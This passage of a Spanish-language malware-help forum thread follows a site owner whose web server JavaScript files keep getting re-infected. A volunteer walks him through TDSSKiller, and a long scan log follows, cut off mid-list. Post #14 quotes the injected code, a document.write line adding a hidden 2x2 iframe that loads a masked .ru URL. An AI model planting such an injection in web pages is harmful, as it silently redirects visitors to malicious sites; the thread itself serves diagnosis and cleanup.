• Registrarse
  • Iniciar sesión


  • Página 2 de 3 PrimeroPrimero 123 ÚltimoÚltimo
    Resultados 11 al 20 de 25

    Malware en mi web ¿PC infectado?

    Ha eliminado las infecciones. ¿Como sigue? Salu2....

    1. #11
      Ex-Colaborador Avatar de Marr0n
      Registrado
      mar 2010
      Ubicación
      Catalunya
      Mensajes
      5.871

      Re: Malware en mi web ¿PC infectado?

      Ha eliminado las infecciones.

      ¿Como sigue?

      Salu2.
      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    2. #12
      Usuario Avatar de chasly
      Registrado
      nov 2010
      Ubicación
      Badalona
      Mensajes
      22

      Re: Malware en mi web ¿PC infectado?

      Hola.

      Parece que va bien. De momento unos archivos de prueba que he puesto en mi servidor no estan infectados. Voy a realizar el mismo proceso que me has indicado en el portátil, creo que también está infectado.

      Gracias.

      Carlos

    3. #13
      Ex-Colaborador Avatar de Marr0n
      Registrado
      mar 2010
      Ubicación
      Catalunya
      Mensajes
      5.871

      Re: Malware en mi web ¿PC infectado?

      De nada, seguimos el mismo procedimiento.

      Pegame ambos reportes y seguimos.

      Salu2.
      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    4. #14
      Usuario Avatar de chasly
      Registrado
      nov 2010
      Ubicación
      Badalona
      Mensajes
      22

      Re: Malware en mi web ¿PC infectado?

      Pues creía que se había solucionado el tema, pero no. Me he conectado con Filezilla al servidor web y de nuevo aparecen archivos infectados en la web. Los modifico y al poco vuelven a aparecer con el código inyectado:

      document.write('<iframe src="http://XXXXXXXXXX.ru/artgallery?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

      El dominio de la URL inyectada cada vez es diferente.

    5. #15
      Ex-Colaborador Avatar de Marr0n
      Registrado
      mar 2010
      Ubicación
      Catalunya
      Mensajes
      5.871

      Re: Malware en mi web ¿PC infectado?

      , por lo que entiendo:

      ¿Sigues teniendo el mismo problema en los dos?

      Salu2.
      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    6. #16
      Usuario Avatar de chasly
      Registrado
      nov 2010
      Ubicación
      Badalona
      Mensajes
      22

      Re: Malware en mi web ¿PC infectado?

      Con los dos ordenadores se me modifican los archivos javascript de la web.

    7. #17
      Ex-Colaborador Avatar de Marr0n
      Registrado
      mar 2010
      Ubicación
      Catalunya
      Mensajes
      5.871

      Re: Malware en mi web ¿PC infectado?

      Descarga TDSSKiller 2.7 | InfoSpyware a tu escritorio, desconectas tu PC de internet.

      .Descomprimes el TDSSKiller.zip y extraes el archivo TDSSKiller.exe

      .Ejecutas el TDSSKiller.exe (si tienes windows 7/vista haz clic con el botón derecho del mouse y seleccionas ejecutar como administrador).

      .Verifica que estén activadas las siguientes casillas:

      1. Services and Drivers
      2. Boot Sectors
      .Presionas Star Scan.



      .Si el equipo esta infectado, haz lo siguiente:

      • Objetos Maliciosos: La acción predeterminada es Cure (desinfectar) o Delete (eliminar). El programa seleccionará de forma automática la acción a realizar.
      • Eliminalos como te muestro en la siguiente imagen:




      • Objetos Sospechosos: Siempre que el programa detecte un objeto como sospechoso (puede estar infectado, pero no tiene porqué) utilizas la opción Skip (saltar), (vale + prevenir, ya que podría ser que estuviera infectado o no).
      • Utiliza la opción Skip para ingorarlos, como te muestro en la siguiente imagen:


      • No olvides en guardar el reporte (si tienes que reiniciar el PC), el reporte lo se ubica en: C:\TDSSKiller.2.5.0_xx.xx.xxxx_xx.xx.xx_log.txt

      sALU2.
      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    8. #18
      Usuario Avatar de chasly
      Registrado
      nov 2010
      Ubicación
      Badalona
      Mensajes
      22

      Re: Malware en mi web ¿PC infectado?

      Hola.

      Me detecto uno como sospechoso y le di a Skip.

      Te adjunto el reporte.

      Gracias por tu ayuda.



      22:13:21.0304 4060 TDSS rootkit removing tool 2.8.8.0 Aug 24 2012 13:27:48
      22:13:23.0309 4060 ============================================================
      22:13:23.0309 4060 Current date / time: 2012/09/16 22:13:23.0309
      22:13:23.0309 4060 SystemInfo:
      22:13:23.0309 4060
      22:13:23.0309 4060 OS Version: 6.1.7100 ServicePack: 0.0
      22:13:23.0309 4060 Product type: Workstation
      22:13:23.0309 4060 ComputerName: PC
      22:13:23.0314 4060 UserName: Carlos
      22:13:23.0314 4060 Windows directory: C:\Windows
      22:13:23.0314 4060 System windows directory: C:\Windows
      22:13:23.0314 4060 Processor architecture: Intel x86
      22:13:23.0314 4060 Number of processors: 2
      22:13:23.0314 4060 Page size: 0x1000
      22:13:23.0314 4060 Boot type: Normal boot
      22:13:23.0314 4060 ============================================================
      22:13:24.0614 4060 Drive \Device\Harddisk0\DR0 - Size: 0x950AF4DE00 (596.17 Gb), SectorSize: 0x200, Cylinders: 0x13001, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
      22:13:24.0654 4060 Drive \Device\Harddisk1\DR1 - Size: 0x1D1C1116000 (1863.02 Gb), SectorSize: 0x200, Cylinders: 0x3B601, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
      22:13:24.0654 4060 Drive \Device\Harddisk2\DR2 - Size: 0x25432CDE00 (149.05 Gb), SectorSize: 0x200, Cylinders: 0x4C01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
      22:13:24.0664 4060 ============================================================
      22:13:24.0664 4060 \Device\Harddisk0\DR0:
      22:13:24.0664 4060 MBR partitions:
      22:13:24.0664 4060 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x3A9A172
      22:13:24.0664 4060 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x3A9A800, BlocksNum 0x46DBC800
      22:13:24.0664 4060 \Device\Harddisk1\DR1:
      22:13:24.0664 4060 MBR partitions:
      22:13:24.0679 4060 \Device\Harddisk1\DR1\Partition1: MBR, Type 0x7, StartLBA 0x3F00, BlocksNum 0xE8E035C1
      22:13:24.0679 4060 \Device\Harddisk2\DR2:
      22:13:24.0679 4060 MBR partitions:
      22:13:24.0679 4060 \Device\Harddisk2\DR2\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x12A18000
      22:13:24.0679 4060 ============================================================
      22:13:24.0689 4060 C: <-> \Device\Harddisk0\DR0\Partition1
      22:13:24.0709 4060 M: <-> \Device\Harddisk1\DR1\Partition1
      22:13:24.0744 4060 P: <-> \Device\Harddisk0\DR0\Partition2
      22:13:24.0749 4060 K: <-> \Device\Harddisk2\DR2\Partition1
      22:13:24.0749 4060 ============================================================
      22:13:24.0749 4060 Initialize success
      22:13:24.0749 4060 ============================================================
      22:13:36.0036 2516 ============================================================
      22:13:36.0036 2516 Scan started
      22:13:36.0036 2516 Mode: Manual;
      22:13:36.0036 2516 ============================================================
      22:13:38.0061 2516 ================ Scan system memory ========================
      22:13:38.0061 2516 System memory - ok
      22:13:38.0061 2516 ================ Scan services =============================
      22:13:38.0236 2516 [ F1E3188DFA3028AAB68B9FD2DD3AFE17 ] 1394ohci C:\Windows\system32\DRIVERS\1394ohci.sys
      22:13:38.0241 2516 1394ohci - ok
      22:13:38.0266 2516 [ 2E435A481093246930D113762FD40F52 ] ACPI C:\Windows\system32\DRIVERS\ACPI.sys
      22:13:38.0276 2516 ACPI - ok
      22:13:38.0291 2516 [ A301411D228DCD07A24ECC62D48F5AE2 ] AcpiPmi C:\Windows\system32\DRIVERS\acpipmi.sys
      22:13:38.0296 2516 AcpiPmi - ok
      22:13:38.0316 2516 [ CB9719B72278864DCA271E214168B1E5 ] adp94xx C:\Windows\system32\DRIVERS\adp94xx.sys
      22:13:38.0351 2516 adp94xx - ok
      22:13:38.0391 2516 [ A1A4F6FC13234C74FBB35F1B7866BDF6 ] adpahci C:\Windows\system32\DRIVERS\adpahci.sys
      22:13:38.0416 2516 adpahci - ok
      22:13:38.0476 2516 [ 92CDAABFDA2C936A87C2823CE4A249DA ] adpu320 C:\Windows\system32\DRIVERS\adpu320.sys
      22:13:38.0491 2516 adpu320 - ok
      22:13:38.0541 2516 [ 7C1011FCFFC748EBFD18FF7499B9CD40 ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
      22:13:38.0541 2516 AeLookupSvc - ok
      22:13:38.0576 2516 [ 183C34872F51D34A41C0EDD3BA05C973 ] AFD C:\Windows\system32\drivers\afd.sys
      22:13:38.0621 2516 AFD - ok
      22:13:38.0646 2516 [ 7DFFC1CD425BCD998D9FDA0192383A19 ] agp440 C:\Windows\system32\DRIVERS\agp440.sys
      22:13:38.0651 2516 agp440 - ok
      22:13:38.0666 2516 [ C2D5D96A3FFAA4D5106A693743BDDFF6 ] aic78xx C:\Windows\system32\DRIVERS\djsvs.sys
      22:13:38.0671 2516 aic78xx - ok
      22:13:38.0686 2516 [ 2C0D11F1D059ECAB4C51E060F9111B98 ] ALG C:\Windows\System32\alg.exe
      22:13:38.0691 2516 ALG - ok
      22:13:38.0701 2516 [ EA9072AD99811A397605D3FC78F4B095 ] aliide C:\Windows\system32\DRIVERS\aliide.sys
      22:13:38.0761 2516 aliide - ok
      22:13:38.0786 2516 [ DBB1161C836883611BB551AE69355BA2 ] amdagp C:\Windows\system32\DRIVERS\amdagp.sys
      22:13:38.0796 2516 amdagp - ok
      22:13:38.0826 2516 [ 05B53F2048C57423D6AB0EA1B9940452 ] amdide C:\Windows\system32\DRIVERS\amdide.sys
      22:13:38.0831 2516 amdide - ok
      22:13:38.0846 2516 [ C395B78A0E601D4FAAA86DD6F24C3F96 ] AmdK8 C:\Windows\system32\DRIVERS\amdk8.sys
      22:13:38.0846 2516 AmdK8 - ok
      22:13:38.0866 2516 [ F0EDFFE3545EB8604DD8F113E095CF5C ] AmdPPM C:\Windows\system32\DRIVERS\amdppm.sys
      22:13:38.0871 2516 AmdPPM - ok
      22:13:38.0891 2516 [ A1EFDF25677AABC65A1F69F4ADB5CE70 ] amdsata C:\Windows\system32\DRIVERS\amdsata.sys
      22:13:38.0901 2516 amdsata - ok
      22:13:38.0926 2516 [ E6641B59279513BF828B85281011057F ] amdsbs C:\Windows\system32\DRIVERS\amdsbs.sys
      22:13:38.0941 2516 amdsbs - ok
      22:13:38.0961 2516 [ 6524374D1080863ED2894AB58C4E7DDA ] amdxata C:\Windows\system32\DRIVERS\amdxata.sys
      22:13:38.0966 2516 amdxata - ok
      22:13:38.0996 2516 [ DD8D9C597AF7CD2F6B70A3D6A4A1ACEA ] androidusb C:\Windows\system32\Drivers\ssadadb.sys
      22:13:39.0016 2516 androidusb - ok
      22:13:39.0086 2516 [ C74C23A62DF56094531C9C02DF1F3282 ] AppHostSvc C:\Windows\system32\inetsrv\apphostsvc.dll
      22:13:39.0096 2516 AppHostSvc - ok
      22:13:39.0111 2516 [ 66EF8D5232C5CF341885D0977854FBAC ] AppID C:\Windows\system32\drivers\appid.sys
      22:13:39.0111 2516 AppID - ok
      22:13:39.0131 2516 [ 4E448B86863E4FE1F800CC06CA980CB2 ] AppIDSvc C:\Windows\System32\appidsvc.dll
      22:13:39.0136 2516 AppIDSvc - ok
      22:13:39.0151 2516 [ E52B2BC18D32D0FC3507E80C1B14A386 ] Appinfo C:\Windows\System32\appinfo.dll
      22:13:39.0156 2516 Appinfo - ok
      22:13:39.0176 2516 [ 9F9F206E4C9B525F0CC73F3B7417E62C ] AppMgmt C:\Windows\System32\appmgmts.dll
      22:13:39.0196 2516 AppMgmt - ok
      22:13:39.0216 2516 [ 70E35AA73967E87BEC99D637969CA372 ] arc C:\Windows\system32\DRIVERS\arc.sys
      22:13:39.0236 2516 arc - ok
      22:13:39.0251 2516 [ 7BEEC1527A46459FCA2099031F91FFDD ] arcsas C:\Windows\system32\DRIVERS\arcsas.sys
      22:13:39.0261 2516 arcsas - ok
      22:13:39.0361 2516 [ 776ACEFA0CA9DF0FAA51A5FB2F435705 ] aspnet_state C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
      22:13:39.0386 2516 aspnet_state - ok
      22:13:39.0411 2516 [ 20E5BEFF143ED1834279D63B695C03B3 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
      22:13:39.0431 2516 AsyncMac - ok
      22:13:39.0446 2516 [ 80C40F7FDFC376E4C5FEEC28B41C119E ] atapi C:\Windows\system32\DRIVERS\atapi.sys
      22:13:39.0446 2516 atapi - ok
      22:13:39.0471 2516 [ 8239783A264761720050C23A3C7B058F ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
      22:13:39.0486 2516 AudioEndpointBuilder - ok
      22:13:39.0511 2516 [ 8239783A264761720050C23A3C7B058F ] Audiosrv C:\Windows\System32\Audiosrv.dll
      22:13:39.0516 2516 Audiosrv - ok
      22:13:39.0551 2516 [ 454A7AA0E071A54CE7E1310B34FD3402 ] AVerAF15DMBTH C:\Windows\system32\Drivers\AVerAF15DMBTH.sys
      22:13:39.0576 2516 AVerAF15DMBTH - ok
      22:13:39.0671 2516 [ 95D7F9544B6C989D1AEBBBE4664BCD70 ] AVerRemote C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe
      22:13:39.0681 2516 AVerRemote - ok
      22:13:39.0706 2516 [ 0DB0AB8415BFF81037981AF1D3BBBE97 ] AVerScheduleService C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe
      22:13:39.0711 2516 AVerScheduleService - ok
      22:13:39.0811 2516 [ 946D70667B0119F2BEEAE0849E1D46A2 ] AVP P:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2011\avp.exe
      22:13:39.0816 2516 AVP - ok
      22:13:39.0851 2516 [ 8A9BCD8C94CEB32099291D83FF692A60 ] AxInstSV C:\Windows\System32\AxInstSV.dll
      22:13:39.0856 2516 AxInstSV - ok
      22:13:39.0881 2516 [ 1A231ABEC60FD316EC54C66715543CEC ] b06bdrv C:\Windows\system32\DRIVERS\bxvbdx.sys
      22:13:39.0901 2516 b06bdrv - ok
      22:13:39.0946 2516 [ E1659F303F2602E0D393269970A09E35 ] b57nd60x C:\Windows\system32\DRIVERS\b57nd60x.sys
      22:13:39.0961 2516 b57nd60x - ok
      22:13:39.0991 2516 [ 60F1F92E2AA5F54D3317513C413B39AE ] BDESVC C:\Windows\System32\bdesvc.dll
      22:13:40.0001 2516 BDESVC - ok
      22:13:40.0026 2516 [ DB8585EB2B657917D41B773392A3F6F9 ] Beep C:\Windows\system32\drivers\Beep.sys
      22:13:40.0036 2516 Beep - ok
      22:13:40.0076 2516 [ 3FDDF12B48AA2C44EA742EA6C7398F32 ] BITS C:\Windows\System32\qmgr.dll
      22:13:40.0101 2516 BITS - ok
      22:13:40.0121 2516 [ 4A7A4276724D6BBC48A754BFDA426C43 ] blbdrive C:\Windows\system32\DRIVERS\blbdrive.sys
      22:13:40.0126 2516 blbdrive - ok
      22:13:40.0141 2516 [ F9FEFEB12BA41B54E11F60449BEC68E2 ] bowser C:\Windows\system32\DRIVERS\bowser.sys
      22:13:40.0146 2516 bowser - ok
      22:13:40.0166 2516 [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo C:\Windows\system32\DRIVERS\BrFiltLo.sys
      22:13:40.0184 2516 BrFiltLo - ok
      22:13:40.0204 2516 [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp C:\Windows\system32\DRIVERS\BrFiltUp.sys
      22:13:40.0210 2516 BrFiltUp - ok
      22:13:40.0224 2516 [ B508545A476F08D1421DFDD7DB0C6108 ] Browser C:\Windows\System32\browser.dll
      22:13:40.0226 2516 Browser - ok
      22:13:40.0248 2516 [ 845B8CE732E67F3B4133164868C666EA ] Brserid C:\Windows\System32\Drivers\Brserid.sys
      22:13:40.0257 2516 Brserid - ok
      22:13:40.0272 2516 [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm C:\Windows\System32\Drivers\BrSerWdm.sys
      22:13:40.0277 2516 BrSerWdm - ok
      22:13:40.0291 2516 [ BD456606156BA17E60A04E18016AE54B ] BrUsbMdm C:\Windows\System32\Drivers\BrUsbMdm.sys
      22:13:40.0297 2516 BrUsbMdm - ok
      22:13:40.0326 2516 [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer C:\Windows\System32\Drivers\BrUsbSer.sys
      22:13:40.0330 2516 BrUsbSer - ok
      22:13:40.0345 2516 [ E1195E078A01135C818D523710DECF88 ] BTHMODEM C:\Windows\system32\DRIVERS\bthmodem.sys
      22:13:40.0350 2516 BTHMODEM - ok
      22:13:40.0371 2516 [ F6DDC89540EE6B7DCB81FD7A9619EE60 ] bthserv C:\Windows\system32\bthserv.dll
      22:13:40.0380 2516 bthserv - ok
      22:13:40.0405 2516 [ 970852ED1893CAAAB6C090AEE57F2AC5 ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
      22:13:40.0414 2516 cdfs - ok
      22:13:40.0438 2516 [ EDF617E3CE277E60B8DDC2B6E99B1D54 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
      22:13:40.0448 2516 cdrom - ok
      22:13:40.0505 2516 cdvp - ok
      22:13:40.0537 2516 [ CC208724CC5F2CB4CC95791BD5A01E24 ] CertPropSvc C:\Windows\System32\certprop.dll
      22:13:40.0542 2516 CertPropSvc - ok
      22:13:40.0564 2516 [ C681994524F48147471AA20C1CA6873F ] circlass C:\Windows\system32\DRIVERS\circlass.sys
      22:13:40.0569 2516 circlass - ok
      22:13:40.0592 2516 [ CC67CB3E19438AF56D17FBB4E73E7A48 ] CLFS C:\Windows\system32\CLFS.sys
      22:13:40.0611 2516 CLFS - ok
      22:13:40.0672 2516 [ F6A8B0E679D49B70895A9BBB938D1AA8 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
      22:13:40.0679 2516 clr_optimization_v2.0.50727_32 - ok
      22:13:40.0770 2516 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      22:13:40.0792 2516 clr_optimization_v4.0.30319_32 - ok
      22:13:40.0815 2516 [ 7DED7AED1165C797DB7052096FA7D8DE ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys
      22:13:40.0821 2516 CmBatt - ok
      22:13:40.0842 2516 [ 2E9A4971F238DC19551C373586AC8E61 ] cmdide C:\Windows\system32\DRIVERS\cmdide.sys
      22:13:40.0855 2516 cmdide - ok
      22:13:40.0909 2516 [ 8265E2FFEEBEFEF63D69F3AC34290284 ] CNG C:\Windows\system32\Drivers\cng.sys
      22:13:40.0929 2516 CNG - ok
      22:13:40.0953 2516 [ C119DDF75E8D22C08502516D8F47965C ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys
      22:13:40.0959 2516 Compbatt - ok
      22:13:40.0984 2516 [ 5E7CF9244ED5F0AAC4B01E82F51C34B1 ] CompositeBus C:\Windows\system32\DRIVERS\CompositeBus.sys
      22:13:40.0988 2516 CompositeBus - ok
      22:13:40.0998 2516 COMSysApp - ok
      22:13:41.0055 2516 [ C2EB4539A4F6AB6EDD01BDC191619975 ] cpuz135 C:\Windows\system32\drivers\cpuz135_x32.sys
      22:13:41.0105 2516 cpuz135 - ok
      22:13:41.0113 2516 cqmghost - ok
      22:13:41.0130 2516 [ 60886E350EE7F7D2F636158047EF7B52 ] crcdisk C:\Windows\system32\DRIVERS\crcdisk.sys
      22:13:41.0134 2516 crcdisk - ok
      22:13:41.0162 2516 [ 3DA62576A423BB1A9D882F7CDEAF21BB ] CryptSvc C:\Windows\system32\cryptsvc.dll
      22:13:41.0166 2516 CryptSvc - ok
      22:13:41.0203 2516 [ 1A8A41AF63D1A2CDC547B2F3C32A3DF5 ] CSC C:\Windows\system32\drivers\csc.sys
      22:13:41.0229 2516 CSC - ok
      22:13:41.0260 2516 [ CD27B17926FF2C4895D2EA448BE5583C ] CscService C:\Windows\System32\cscsvc.dll
      22:13:41.0285 2516 CscService - ok
      22:13:41.0325 2516 [ 0E829890E9E00BBBA3352B02C718CB63 ] DcomLaunch C:\Windows\system32\rpcss.dll
      22:13:41.0365 2516 DcomLaunch - ok
      22:13:41.0400 2516 [ 0502C0314B97E3B10521F0EB35DE6389 ] defragsvc C:\Windows\System32\defragsvc.dll
      22:13:41.0415 2516 defragsvc - ok
      22:13:41.0445 2516 [ FB5BC26CA0B713C3B83F8B5B55BFCA51 ] DfsC C:\Windows\system32\Drivers\dfsc.sys
      22:13:41.0470 2516 DfsC - ok
      22:13:41.0505 2516 [ DD0C4C2864E69696B51A3BDBD9DD009B ] Dhcp C:\Windows\system32\dhcpcore.dll
      22:13:41.0515 2516 Dhcp - ok
      22:13:41.0535 2516 [ 39E41536536C6A73E54723744926758C ] discache C:\Windows\system32\drivers\discache.sys
      22:13:41.0550 2516 discache - ok
      22:13:41.0575 2516 [ A379F8C88D9825098027EFAABF3EB337 ] Disk C:\Windows\system32\DRIVERS\disk.sys
      22:13:41.0580 2516 Disk - ok
      22:13:41.0595 2516 [ 227A62E6B51EEA26EAA2668037007E28 ] Dnscache C:\Windows\System32\dnsrslvr.dll
      22:13:41.0600 2516 Dnscache - ok
      22:13:41.0620 2516 [ 46731FFAB05F8C8660300D40A11F28E6 ] dot3svc C:\Windows\System32\dot3svc.dll
      22:13:41.0640 2516 dot3svc - ok
      22:13:41.0660 2516 [ B5146D81FE5C1C949A0E5EFA0BFC049E ] DPS C:\Windows\system32\dps.dll
      22:13:41.0660 2516 DPS - ok
      22:13:41.0695 2516 [ 64506061C2F506747CCBF36E204D518A ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
      22:13:41.0755 2516 drmkaud - ok
      22:13:41.0790 2516 [ 555E54AC2F601A8821CEF58961653991 ] dtsoftbus01 C:\Windows\system32\DRIVERS\dtsoftbus01.sys
      22:13:41.0795 2516 dtsoftbus01 - ok
      22:13:41.0835 2516 [ 90CDB54A4ACB66B29D0DE83A3848D813 ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
      22:13:41.0855 2516 DXGKrnl - ok
      22:13:41.0875 2516 [ 6C4EBC011F72D9920DBE7156716306BD ] EapHost C:\Windows\System32\eapsvc.dll
      22:13:41.0875 2516 EapHost - ok
      22:13:41.0940 2516 [ 024E1B5CAC09731E4D868E64DBFB4AB0 ] ebdrv C:\Windows\system32\DRIVERS\evbdx.sys
      22:13:42.0005 2516 ebdrv - ok
      22:13:42.0035 2516 [ 62C4EF46A710A84416AEA89E52C01833 ] EFS C:\Windows\System32\lsass.exe
      22:13:42.0035 2516 EFS - ok
      22:13:42.0110 2516 [ BC200BCAA4249AD3BAC88309BB5CF6E3 ] ehRecvr C:\Windows\ehome\ehRecvr.exe
      22:13:42.0135 2516 ehRecvr - ok
      22:13:42.0145 2516 [ 604D93A8D626BB36A6B6D058F0626A6E ] ehSched C:\Windows\ehome\ehsched.exe
      22:13:42.0150 2516 ehSched - ok
      22:13:42.0170 2516 [ A2984D22D8337BAE947F63DE9A8305E1 ] elxstor C:\Windows\system32\DRIVERS\elxstor.sys
      22:13:42.0185 2516 elxstor - ok
      22:13:42.0245 2516 [ EC6A73CD8413F68655E5E0B99C415A21 ] EPSON_EB_RPCV4_01 C:\ProgramData\EPSON\EPW!3 SSRP\E_S40ST7.EXE
      22:13:42.0255 2516 EPSON_EB_RPCV4_01 - ok
      22:13:42.0275 2516 [ 8FE6AB59CAB8F2C038FEA9522A5EEBA7 ] EPSON_PM_RPCV4_01 C:\ProgramData\EPSON\EPW!3 SSRP\E_S40RP7.EXE
      22:13:42.0280 2516 EPSON_PM_RPCV4_01 - ok
      22:13:42.0300 2516 [ 12C8D0197528048BFFA687DE93E3C3B3 ] ErrDev C:\Windows\system32\DRIVERS\errdev.sys
      22:13:42.0325 2516 ErrDev - ok
      22:13:42.0385 2516 [ CF1602A6FE49BAC4E27A2A51E5B1F448 ] EventSystem C:\Windows\system32\es.dll
      22:13:42.0400 2516 EventSystem - ok
      22:13:42.0425 2516 [ 73A6551C0BEA6E3F13699932F97D8A9D ] exfat C:\Windows\system32\drivers\exfat.sys
      22:13:42.0435 2516 exfat - ok
      22:13:42.0455 2516 [ 7597DF0FD7028049D770DDF4AB86B50D ] fastfat C:\Windows\system32\drivers\fastfat.sys
      22:13:42.0460 2516 fastfat - ok
      22:13:42.0495 2516 [ 40BA18140F58FAD95AA663C82ADF58E8 ] Fax C:\Windows\system32\fxssvc.exe
      22:13:42.0510 2516 Fax - ok
      22:13:42.0535 2516 [ 627477D6123005AD9CE5810A3D677302 ] fdc C:\Windows\system32\DRIVERS\fdc.sys
      22:13:42.0550 2516 fdc - ok
      22:13:42.0570 2516 [ 4DC3CCD7082C8633D9701D635DF0C034 ] fdPHost C:\Windows\system32\fdPHost.dll
      22:13:42.0570 2516 fdPHost - ok
      22:13:42.0585 2516 [ 7B38E9F4E25B94D52B13705C7CE86953 ] FDResPub C:\Windows\system32\fdrespub.dll
      22:13:42.0590 2516 FDResPub - ok
      22:13:42.0605 2516 [ DB256B7FA5FBB37436F52238D84ABB8B ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
      22:13:42.0610 2516 FileInfo - ok
      22:13:42.0625 2516 [ F52E7DF356A6885741DEA5D2D9C6AC20 ] Filetrace C:\Windows\system32\drivers\filetrace.sys
      22:13:42.0630 2516 Filetrace - ok
      22:13:42.0645 2516 [ A2B49CDC1F176B2F5169C64A563B1E6D ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys
      22:13:42.0650 2516 flpydisk - ok
      22:13:42.0665 2516 [ 1E158DEFC36838CACEDC465900B1D76A ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
      22:13:42.0675 2516 FltMgr - ok
      22:13:42.0715 2516 [ A16DB1C4C9B14F786C623EE9F478E066 ] FontCache C:\Windows\system32\FntCache.dll
      22:13:42.0780 2516 FontCache - ok
      22:13:42.0820 2516 [ 964FB6494E33F5D476DAE4FF51AD9A8B ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
      22:13:42.0825 2516 FontCache3.0.0.0 - ok
      22:13:42.0850 2516 [ E2AC950EE2769827E2E04F3A7849B08A ] FsDepends C:\Windows\system32\drivers\FsDepends.sys
      22:13:42.0855 2516 FsDepends - ok
      22:13:42.0870 2516 [ A1ED4A69BFD446651642FEF693D8277C ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
      22:13:42.0880 2516 Fs_Rec - ok
      22:13:42.0910 2516 [ F914CCAAE271C07956220C45BF81C967 ] fvevol C:\Windows\system32\DRIVERS\fvevol.sys
      22:13:42.0925 2516 fvevol - ok
      22:13:42.0945 2516 [ CE3FC4EFC8F25F43C9BBD7E154CA87CC ] gagp30kx C:\Windows\system32\DRIVERS\gagp30kx.sys
      22:13:42.0955 2516 gagp30kx - ok
      22:13:42.0980 2516 [ F8EE2BA4A4FFF6817EEDEBB616FB047D ] gpsvc C:\Windows\System32\gpsvc.dll
      22:13:43.0000 2516 gpsvc - ok
      22:13:43.0070 2516 [ F02A533F517EB38333CB12A9E8963773 ] gupdate C:\Program Files\Google\Update\GoogleUpdate.exe
      22:13:43.0075 2516 gupdate - ok
      22:13:43.0100 2516 [ F02A533F517EB38333CB12A9E8963773 ] gupdatem C:\Program Files\Google\Update\GoogleUpdate.exe
      22:13:43.0100 2516 gupdatem - ok
      22:13:43.0145 2516 [ 5D4BC124FAAE6730AC002CDB67BF1A1C ] gusvc C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
      22:13:43.0150 2516 gusvc - ok
      22:13:43.0165 2516 [ A65DED2EBD1C922D311545A2E7697332 ] hcw85cir C:\Windows\system32\drivers\hcw85cir.sys
      22:13:43.0170 2516 hcw85cir - ok
      22:13:43.0215 2516 [ 787DB0069819640A7879297C09A272CC ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
      22:13:43.0240 2516 HdAudAddService - ok
      22:13:43.0260 2516 [ 3437421020BA6DE5F35CE8EFF301D41A ] HDAudBus C:\Windows\system32\DRIVERS\HDAudBus.sys
      22:13:43.0265 2516 HDAudBus - ok
      22:13:43.0285 2516 [ 563DDB955D8FF84EA227045E931E7FE0 ] HidBatt C:\Windows\system32\DRIVERS\HidBatt.sys
      22:13:43.0295 2516 HidBatt - ok
      22:13:43.0325 2516 [ CF7DD6258CE05A7F1621CA8F67E615C6 ] HidBth C:\Windows\system32\DRIVERS\hidbth.sys
      22:13:43.0330 2516 HidBth - ok
      22:13:43.0370 2516 [ 5DD466267F11BAB4272255CE6E11A55F ] HidIr C:\Windows\system32\DRIVERS\hidir.sys
      22:13:43.0385 2516 HidIr - ok
      22:13:43.0410 2516 [ E0A1CAD678E1A7775B495BD8961FE725 ] hidserv C:\Windows\system32\hidserv.dll
      22:13:43.0410 2516 hidserv - ok
      22:13:43.0430 2516 [ 3B197964C30462A9180724CE44A7F7F9 ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys
      22:13:43.0440 2516 HidUsb - ok
      22:13:43.0460 2516 [ D7967C23CDAB0148525788B828E6EAE2 ] hkmsvc C:\Windows\system32\kmsvc.dll
